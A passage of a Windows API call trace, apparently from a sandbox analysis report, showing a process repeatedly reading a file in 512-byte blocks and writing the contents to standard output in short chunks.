lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] GetFileType (hFile=0x4c) returned 0x1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0207.313] GetFileType (hFile=0x4c) returned 0x1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.313] GetFileType (hFile=0x4c) returned 0x1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] GetFileType (hFile=0x4c) returned 0x1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] GetFileType (hFile=0x4c) returned 0x1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] GetFileType (hFile=0x4c) returned 0x1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.314] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.314] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.314] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.314] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] GetFileType (hFile=0x4c) returned 0x1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] GetFileType (hFile=0x4c) returned 0x1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] GetFileType (hFile=0x4c) returned 0x1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.314] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] GetFileType (hFile=0x4c) returned 0x1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] GetFileType (hFile=0x4c) returned 0x1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: 
lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] GetFileType (hFile=0x4c) returned 0x1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] GetFileType (hFile=0x4c) returned 0x1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] GetFileType (hFile=0x4c) returned 0x1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.315] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.315] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.315] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.315] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] GetFileType (hFile=0x4c) returned 0x1 [0207.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.315] GetFileType (hFile=0x4c) returned 0x1 [0207.315] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0207.315] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] GetFileType (hFile=0x4c) returned 0x1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] GetFileType (hFile=0x4c) returned 0x1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] GetFileType (hFile=0x4c) returned 0x1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] GetFileType (hFile=0x4c) returned 0x1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] GetFileType (hFile=0x4c) returned 0x1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0207.316] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] GetFileType (hFile=0x4c) returned 0x1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.316] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.316] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.316] GetFileType (hFile=0x4c) returned 0x1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] GetFileType (hFile=0x4c) returned 0x1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] GetFileType (hFile=0x4c) returned 0x1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 
[0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] GetFileType (hFile=0x4c) returned 0x1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] GetFileType (hFile=0x4c) returned 0x1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] GetFileType (hFile=0x4c) returned 0x1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] GetFileType (hFile=0x4c) returned 0x1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.317] GetFileType (hFile=0x4c) returned 0x1 [0207.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.318] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0207.318] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.318] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.318] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] GetFileType (hFile=0x4c) returned 0x1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] GetFileType (hFile=0x4c) returned 0x1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] GetFileType (hFile=0x4c) returned 0x1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] GetFileType (hFile=0x4c) returned 0x1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] GetFileType (hFile=0x4c) returned 0x1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] GetFileType (hFile=0x4c) returned 0x1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] GetFileType (hFile=0x4c) returned 0x1 [0207.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.318] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] GetFileType (hFile=0x4c) returned 0x1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.319] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.319] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.319] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.319] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] GetFileType (hFile=0x4c) returned 0x1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] GetFileType 
(hFile=0x4c) returned 0x1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] GetFileType (hFile=0x4c) returned 0x1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] GetFileType (hFile=0x4c) returned 0x1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] GetFileType (hFile=0x4c) returned 0x1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] GetFileType (hFile=0x4c) returned 0x1 [0207.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.319] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] GetFileType (hFile=0x4c) returned 0x1 [0207.320] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] GetFileType (hFile=0x4c) returned 0x1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.320] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.320] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.320] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.320] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] GetFileType (hFile=0x4c) returned 0x1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] GetFileType (hFile=0x4c) returned 0x1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] GetFileType (hFile=0x4c) returned 0x1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, 
lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] GetFileType (hFile=0x4c) returned 0x1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.320] GetFileType (hFile=0x4c) returned 0x1 [0207.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] GetFileType (hFile=0x4c) returned 0x1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] GetFileType (hFile=0x4c) returned 0x1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] GetFileType (hFile=0x4c) returned 0x1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, 
lpOverlapped=0x0) returned 1 [0207.321] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.321] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.321] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.321] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] GetFileType (hFile=0x4c) returned 0x1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] GetFileType (hFile=0x4c) returned 0x1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.321] GetFileType (hFile=0x4c) returned 0x1 [0207.321] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] GetFileType (hFile=0x4c) returned 0x1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] 